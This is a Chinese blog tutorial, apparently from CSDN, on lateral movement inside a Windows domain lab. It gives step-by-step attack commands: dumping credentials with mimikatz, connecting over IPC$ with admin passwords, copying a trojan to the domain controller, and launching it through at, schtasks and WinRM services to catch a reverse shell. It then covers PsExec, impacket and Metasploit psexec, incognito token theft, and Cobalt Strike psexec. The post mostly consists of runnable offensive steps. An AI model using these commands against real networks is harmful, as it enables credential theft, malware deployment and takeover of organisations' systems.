内网横向移动

矫情吗；* 2023-10-15 14:24 5阅读 0赞

## 内网横向移动 ##

当攻击者在拿下一台内网主机后，通常会利用当前拿下的机器当作跳板，进一步攻击 内网其他主机，扩大攻击影响范围。

攻击机：Kali Linux

靶机： Windows server 2008 WEB 10.10.10.20\\192.168.XX.XX(跳板机)

Windows server 2012 DC 10.10.10.10\\192.168.XX.XX

**获得WEB shell后，获取所有账号密码**

load kiwi \#mimikatz

![690321f140bd44fb8c297448417cdd5b.png][]

getsystem 提升权限

creds\_all 获取所有帐户密码

\#将目标主机账号密码复制下来备用

![da198b0c3c904ffb9614b4e1e91b2656.png][]

####  ####

#### IPC$简介 ####

**IPC$ (Internet Process Connection) 是共享"命名管道"的资源**，它是为了让进程间 通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的 通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。

利用 IPC$ ，连接者与目标主机利用建立的连接可以得到目标主机上的目录结构、用 户列表等信息。

#### **使用条件** ####

**1.开放了 139 、 445 端口；**

IPC$ 连接可以实现远程登陆及对默认共享的访问，而 139 端口的开启表示 netbios 协议的应用。

我们可以通过 139 和 445 端口来实现对共享文件/打印机的访问，因此一般来讲， IPC$ 连接是需要 139 或 445 端口来支持的。

IPC$ 连接默认会走 445 端口，不通的话则会走 139 端口，这两个端口都可以单独实 现文件共享

**2.目标开启 IPC$ 文件共享服务及默认共享**

默认共享是为了方便管理员远程管理而默认开启的共享。

所有逻辑磁盘（ c$、d$、e$ ...）和系统目录 WINNT 或 WINDOWS（ADMIN$） ，通过 IPC连接可以实现对这些默认共享的访问

net share

![6e25a6ec84d24753a8e27ec08eb0fb8a.png][]

**3.需要目标机器的管理员账号和密码**

默认情况下只有被添加到远程计算机管理员组的域用户（域管用户）有权限对 admin$ 目录建立 IPC 连接

本地的 Administrator 用户也可以，但是默认情况下该用户是被禁用的，如果启用了该用户，那么也可以使用 Administrator 用户远程连接

#### **常用命令** ####

> 1. 连接
> 
> net use \\\\10.10.10.10\\ipc$ /user:web\\administrator "admin@123"
> 
> 2. 查看连接情况
> 
> net use
> 
> 3. 查看目标主机时间
> 
> net time \\\\10.10.10.10
> 
> 4. 删除连接
> 
> net use \\\\10.10.10.10\\ipc$ /del
> 
> net use \* /del /y \#删除所有连接
> 
> 5. 文件上传下载
> 
> copy shell.exe \\\\10.10.10.10\\c$\\windows\\temp\\xxx.exe
> 
> copy \\\\10.10.10.10\\c$\\xxx.exe c:\\ \#从目标机器下载到本地
> 
> 6. 查看目标主机文件
> 
> dir \\\\10.10.10.10\\c$
> 
> 7. 开放/关闭 ipc$ 共享
> 
> net share ipc$
> 
> net share ipc$ /del
> 
> 8. 共享计算机 C 盘
> 
> net share C=c:\\
> 
> 9. 映射共享磁盘到本地
> 
> net use z: \\\\10.10.10.10\\c$ /user:administrator "xxxxxxxxx"
> 
> 10. 查看/删除共享的资源
> 
> net share
> 
> net share C /del
> 
> 11. 取消IPC远程连接
> 
> net use c: /del
> 
> net use \* /del /y
> 
> \#建议手打命令

**IPC$连接失败常见错误号**

> 错误号 5，拒绝访问 【很可能你使用的用户不是管理员权 限，先提升权限】
> 
> 错误号 51，Windows 无法找到网络路径 【网络有问题】
> 
> 错误号 53，找不到网络路径 【ip 地址错误；目标未开机；目标 lanmanserver 服务未启动；目标有防火墙（端口过滤）】
> 
> 错误号 67，找不到网络名 【你的 lanmanworkstation服务未启动；目标删除了 ipc$；】
> 
> 错误号 1219，提供的凭据与已存在的凭据集冲突 【你已经和对方建立了一个 ipc$，请删除后再连】
> 
> 错误号 1326，未知的用户名或错误密码 【用户名或密码错误】
> 
> 错误号 1385，登录失败：未授予用户在此计算机上的请求登录类型
> 
> 错误号 1792，试图登录，但是网络登录服务没有启动 【目标NetLogon服务未 启动\[连接域控会出现此情况\]】
> 
> 错误号 2242，此用户的密码已经过期 【目标有帐号策略，强 制定期要求更改密码】

####  ####

### IPC+AT+Schtasks ###

#### AT简介 ####

**AT命令可在指定时间和日期、在指定计算机上运行命令和程序**

**\#**Windows2012以下系统可使用at命令

> net use \\\\10.10.10.10\\C$ /user:starry\\administrator "admin@123"
> 
> copy c:\\\\dc.exe \\\\10.10.10.10\\c$\\windows\\temp\\6888.exe \#下载木马
> 
> 查看远程主机时间：net time \\\\10.10.10.10
> 
> AT命令添加任务：at \\\\10.10.10.10 10:10 c:\\6888.exe
> 
> AT命令删除任务：at \\\\10.10.10.10 1 /delete
> 
> AT命令查看任务：at \\\\10.10.10.10 \#查看at任务列表，已经执行了的，不会显示

####  ####

#### Schtasks简介 ####

由于 AT 在 windows server 2012 等新版系统中已被弃用，所以需要使用 schtasks 命令代替

允许管理员创建、删除、查询、更改、运行和中止本地或远程系统上的计划任务

请参考：[Windows使用SCHTASKS 命令执行定时任务\_刘李404not found的博客-CSDN博客][Windows_SCHTASKS _404not found_-CSDN]

> **创建任务**
> 
> schtasks /create /tn task /U 域\\域用户 /P 域用户密码 /tr 命令 /sc ONSTART /s 域机器ip /RU system
> 
> **运行任务**
> 
> schtasks /run /tn task /s 192.168.10.2 /U 域/域用户 /P 域用户密码
> 
> **删除任务**
> 
> schtasks /F /delete /tn task /s 域机器ip /U 域\\域用户 /p 域用户密 码

> schtasks /create 创建新的计划任务。
> 
> /sc schedule 指定计划类型。有效值为 MINUTE、HOURLY、 DAILY、WEEKLY、MONTHLY、ONCE、ONSTART、ONLOGON、ONIDLE。
> 
> /mo modifier 指定任务在其计划类型内的运行频率。这个参数 对于 MONTHLY 计划是必需的。
> 
> 对于 MINUTE、HOURLY、DAILY 或 WEEKLY 计划，这个参数有效，但也可选。默认值为 1。 /tr 指定任务运行的程序或命令。如果忽略该路径， SchTasks.exe 将假定文件在 Systemroot\\System32 目录下。
> 
> /tn 指定任务的名称。

**建立IPC连接**

net use \\\\10.10.10.10\\ipc$ "admin@123" /user:administrator \#连接DC主机

**上传木马**

> dir \\\\10.10.10.10\\c$
> 
> copy c:\\6888.exe \\\\10.10.10.10\\c$

![16b3ee5939ba4dd7adc485fe73669f5f.png][]

**远程主机创建定时任务**

> schtasks /create /s 10.10.10.10 /u "dc\\administrator" /p "admin@123" /sc MINUTE /mo 1 /tn task /tr "c:\\\\6888.exe" \#复制命令可能报错！建议手打命令

![982e7037ac9f43caaa8530c67450af4e.png][]

一分钟后，反弹shell

![6238d9ef9d0e4c889c0d7083c5750183.png][]

**查看远程主机创建的定时任务**

> chcp 65001 \#不更改代码页编码，直接查看可能会报错
> 
> schtasks /query /s 10.10.10.10 /tn task \#查看定时任务

**Schtasks运行远程主机上的计划任务**

schtasks /run /s 10.10.10.10 /u administrator /p "admin@123" /tn task

**Schtasks删除远程主机上的计划任务**

schtasks /delete /tn task /s 10.10.10.10 /u dc\\administrator /p admin@123

### WinRM ###

WinRM 指的是Windows远程管理服务，通过远程连接winRM模块可以操作 windows命令行，默认监听端口5985（HTTP）和5986 (HTTPS)，在2012及以后默认开启

**开启WinRM**

判断本机是否开启WinRM服务

> winrm enumerate winrm/config/listener

查看远程主机是否开启WinRM服务：

serverscan.exe -h 10.10.10.10 -p 5985,5986

nmap -A sV 192.168.1.6 -p 5985,5986

![1c790201487a495e9fb2fb5f778b2fde.png][]

命令开启WinRM服务

winrm quickconfig

![d73164d2e2bd46239b426c2d253579d3.png][]

允许远程主机访问及访问远程主机

WinRM只允许当前域用户或者处于本机TrustedHosts列表中的远程主机进行访问

> winrm set winrm/config/client @\{TrustedHosts="\*"\} \#允许所有主机访问

#### Winrs执行命令 ####

> winrs -r:http://10.10.10.10:5985 -u:administrator -p:admin@123 ipconfig \#建议手打命令

![5d8fe90405b244c3947200a1146e3eae.png][]

> winrs -r:http://10.10.10.10:5985 -u:administrator -p:admin@123 "cmd.exe"

![9991437accb7473494dc8c922d9635c6.png][]

####  ####

#### **WinRM横向移动** ####

利用winrm参数选项中的invoke参数，来对目标对象执行特定的方法。

> winrm invoke create wmicimv2/win32\_process @\{Commandline="calc.exe"\}
> 
> 命令调用了Windows WMI中Win32\_process类的Create方法，生成了一个 calc.exe的新进程

在远程机器上打开进程

> winrm invoke create wmicimv2/win32\_process @\{Commandline="calc.exe"\} -r:http://10.10.10.10:5985 - u:administrator -p:admin@123

在远程机器上创建服务

> winrm invoke Create wmicimv2/Win32\_Service @\{Name="task";DisplayName="test";PathName="cmd.exe /k c:\\6888.exe"\} -r:http://10.10.10.10:5985 -u:administrator - p:admin@123

![3557ebe172d44d8ebf88d2b0c447cf33.png][]

在远程机器上启动服务

> winrm invoke StartService wmicimv2/Win32\_Service?Name=task -r:http://10.10.10.10:5985 -u:administrator -p:admin@123

![16d5387f632b4c6fb873c5001db3e099.png][]

MSF启动侦听，反弹shell![f77d998a54304d9bb7e5345948db10a5.png][]

## 横向移动-外部工具 ##

### Psexec ###

PsExec是一种轻巧的telnet替代品，可让您在其他系统上执行进程，并为控制台应用 程序提供完整的交互性，而无需手动安装客户端软件。

**Psexec原理**

> 1. ipc$ 连接,释放 Psexesvc.exe
> 
> 2. 通过服务管理 OpenSCManager 打开受害者机器上服务控制管理器的句柄
> 
> 3. 通过 CreateService 创建服务
> 
> 4. 获取服务句柄 OpenService 使用 StartService 启动服务

**Psexec使用前提**

> 1. 对方主机开启了 admin$ 共享，如果关闭了 admin$ 共享，会提示：找不到网络名
> 
> 2. 对方未开启防火墙
> 
> 3. 如果是工作组环境，则必须使用 administrator 用户连接（因为要在目标主机 上面创建并启动服务），使用其他账号(包括管理员组中的非administrator用户) 登录都会提示访问拒绝访问。
> 
> 4. 如果是域环境，即可用普通域用户连接也可以用域管理员用户连接。连接普通域 主机可以用普通域用户，连接域控只能用域管理员账户。

**PsExec.exe使用**

微软官方工具包

[PsExec - Sysinternals | Microsoft Learn][PsExec - Sysinternals _ Microsoft Learn]

IPC连接

net use \\\\10.10.10.10\\ipc$ /user:administrator "admin@123"

![9e44ecfbe96f447996c62645d074181a.png][]

建立IPC连接，无需输入密码

反弹cmd：

PsExec64.exe \\\\10.10.10.10 -s cmd.exe -accepteula

无法启动服务,执行命令没有回显，但是可以运行木马上线。

![699245dcf98e44c9b8fcb73c79684d46.png][]

在WEB主机上可以运行命令

![1de34e3f8f904badbc5ebca5f659621c.png][]

#### Psexec.py ####

impacket 套件中的 Psexec 与官方 psexec.exe 相比会自动删除服务，增加隐蔽性.

下载地址：

[https://github.com/SecureAuthCorp/impacket][https_github.com_SecureAuthCorp_impacket]

psexec.py starry/administrator:admin@123@10.10.10.10

#### Psexec.exe ####

目标机器没有python环境，所以把 .py文件打包成 .exe文件

下载地址：

[https://github.com/maaaaz/impacket-examples-windows][https_github.com_maaaaz_impacket-examples-windows]

psexec.exe starry/administrator:admin@123@10.10.10.10 whoami

#### **Metasploit** ####

Psexec

> use exploit/windows/smb/psexec
> 
> set RHOSTS 10.10.10.10
> 
> set SMBDomain starry
> 
> set smbuser administrator
> 
> set smbpass admin@123
> 
> exploit

Token窃取

**Windows有两种类型的Token：**

Delegation token(授权令牌):用于交互会话登录(例如本地用户直接登录、远程 桌面登录) Impersonation token(模拟令牌):用于非交互登录(利用net use访问共享文件夹)

**两种token只在系统重启后清除**

具有Delegation token的用户在注销后，该Token将变成Impersonation token，依旧有效

**Metasploit**

在Metasploit中，可使用incognito实现token窃取，Metasploit中的 incognito，是从windows平台下的incognito移植过来的

> \# 加载incognito模块
> 
> load incognito
> 
> \# 列举token
> 
> list\_tokens -u
> 
> \# 查看当前token
> 
> getuid
> 
> \# 提示至system权限
> 
> getsystem
> 
> \# token窃取
> 
> impersonate\_token "NT AUTHORITY\\\\SYSTEM"
> 
> \# 从进程窃取token
> 
> steal\_token 1208
> 
> \# 返回之前token
> 
> rev2self | drop\_token

####  ####

#### Cobaltstrike ####

跳板机：Windows 7 旗舰版

内网机器：Windows server2008、Windows server 2012

跳板机提升权限

利用ms14-058漏洞

![f0e0b9fb91864372883144cddf9ad67e.png][]

![58f914c0d0694af6be518e76d008e2e1.png][]

**凭证获取**

hashdump \#获取hash

logonpasswords \#获取明文密码

**扫描存活主机**

PortScan扫描存活主机 \#没有扫描结果

Net View 网络视图

结果如下：

![a094358e57e24a259f6e5fe765c92d89.png][]

**Psexec**

由于DC不出网，需要添加正向监听

选择Beacon SMB，点击保存

![9f9dbbfb6e324b758c9c5547957a18c2.png][]

选择DC右击，选择psexec

![ab5148cc95f64cf38c35df37a836883a.png][]

Domain:域名

Listener:选择刚才生成的Beacon SMB

session：选择web主机

点击Launch

\#\#前提是知道目标主机密码!!!

![18efd8a712e4468b85362d666e5f6d59.png][]

上线成功

![cdd22ada14cf4a4a8cdfdc6e73e0f69e.png][]

...

[690321f140bd44fb8c297448417cdd5b.png]: https://img-blog.csdnimg.cn/690321f140bd44fb8c297448417cdd5b.png
[da198b0c3c904ffb9614b4e1e91b2656.png]: https://img-blog.csdnimg.cn/da198b0c3c904ffb9614b4e1e91b2656.png
[6e25a6ec84d24753a8e27ec08eb0fb8a.png]: https://img-blog.csdnimg.cn/6e25a6ec84d24753a8e27ec08eb0fb8a.png
[Windows_SCHTASKS _404not found_-CSDN]: https://blog.csdn.net/qq_39680564/article/details/88993633
[16b3ee5939ba4dd7adc485fe73669f5f.png]: https://img-blog.csdnimg.cn/16b3ee5939ba4dd7adc485fe73669f5f.png
[982e7037ac9f43caaa8530c67450af4e.png]: https://img-blog.csdnimg.cn/982e7037ac9f43caaa8530c67450af4e.png
[6238d9ef9d0e4c889c0d7083c5750183.png]: https://img-blog.csdnimg.cn/6238d9ef9d0e4c889c0d7083c5750183.png
[1c790201487a495e9fb2fb5f778b2fde.png]: https://img-blog.csdnimg.cn/1c790201487a495e9fb2fb5f778b2fde.png
[d73164d2e2bd46239b426c2d253579d3.png]: https://img-blog.csdnimg.cn/d73164d2e2bd46239b426c2d253579d3.png
[5d8fe90405b244c3947200a1146e3eae.png]: https://img-blog.csdnimg.cn/5d8fe90405b244c3947200a1146e3eae.png
[9991437accb7473494dc8c922d9635c6.png]: https://img-blog.csdnimg.cn/9991437accb7473494dc8c922d9635c6.png
[3557ebe172d44d8ebf88d2b0c447cf33.png]: https://img-blog.csdnimg.cn/3557ebe172d44d8ebf88d2b0c447cf33.png
[16d5387f632b4c6fb873c5001db3e099.png]: https://img-blog.csdnimg.cn/16d5387f632b4c6fb873c5001db3e099.png
[f77d998a54304d9bb7e5345948db10a5.png]: https://img-blog.csdnimg.cn/f77d998a54304d9bb7e5345948db10a5.png
[PsExec - Sysinternals _ Microsoft Learn]: https://learn.microsoft.com/zh-cn/sysinternals/downloads/psexec
[9e44ecfbe96f447996c62645d074181a.png]: https://img-blog.csdnimg.cn/9e44ecfbe96f447996c62645d074181a.png
[699245dcf98e44c9b8fcb73c79684d46.png]: https://img-blog.csdnimg.cn/699245dcf98e44c9b8fcb73c79684d46.png
[1de34e3f8f904badbc5ebca5f659621c.png]: https://img-blog.csdnimg.cn/1de34e3f8f904badbc5ebca5f659621c.png
[https_github.com_SecureAuthCorp_impacket]: https://github.com/SecureAuthCorp/impacket
[https_github.com_maaaaz_impacket-examples-windows]: https://github.com/maaaaz/impacket-examples-windows
[f0e0b9fb91864372883144cddf9ad67e.png]: https://img-blog.csdnimg.cn/f0e0b9fb91864372883144cddf9ad67e.png
[58f914c0d0694af6be518e76d008e2e1.png]: https://img-blog.csdnimg.cn/58f914c0d0694af6be518e76d008e2e1.png
[a094358e57e24a259f6e5fe765c92d89.png]: https://img-blog.csdnimg.cn/a094358e57e24a259f6e5fe765c92d89.png
[9f9dbbfb6e324b758c9c5547957a18c2.png]: https://img-blog.csdnimg.cn/9f9dbbfb6e324b758c9c5547957a18c2.png
[ab5148cc95f64cf38c35df37a836883a.png]: https://img-blog.csdnimg.cn/ab5148cc95f64cf38c35df37a836883a.png
[18efd8a712e4468b85362d666e5f6d59.png]: https://img-blog.csdnimg.cn/18efd8a712e4468b85362d666e5f6d59.png
[cdd22ada14cf4a4a8cdfdc6e73e0f69e.png]: https://img-blog.csdnimg.cn/cdd22ada14cf4a4a8cdfdc6e73e0f69e.png